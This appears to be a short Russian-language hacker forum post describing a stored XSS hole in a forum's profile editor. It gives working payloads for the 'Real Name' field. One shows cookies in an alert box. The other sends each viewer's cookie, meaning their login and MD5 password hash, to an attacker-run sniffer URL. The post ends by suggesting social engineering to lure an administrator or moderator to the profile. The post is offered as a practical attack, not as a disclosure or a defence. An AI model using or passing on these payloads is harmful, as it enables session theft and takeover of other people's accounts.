Суть уязвимости в том что за регавшись на форуме, в контрольном меню можно ввести прозивольную XSS.
А точнее заходим в раздел редактирования профиля My Profile-->Edit My Profile
В поле Real Name вводим имя затем XSS, пример:
Код:
Вовочка<script>alert(document.cookie)</script>
Сохраняем, при просмотре профиля выскачит окно с вашими куками, точенее ваш логин и MD5 хеш, то что нам нужно
Теперь как можно употребить на других,
В поле Real Nаme вставим:
Код:
Вовочка<script>img = new Image(); img.src = "http://site.com/снифер/сниф.jpg?"+document.cookie;</script>
Или че то подобное, где URL это адрес снифера.
Теперь каждый юзверь при просмотре вашего профиля отсылает на лог снифера свой логин и хеш МД5.
Вопрос как заманить нужную жертву (админ или модер) на ваш профиль...это дело соц. инженерии.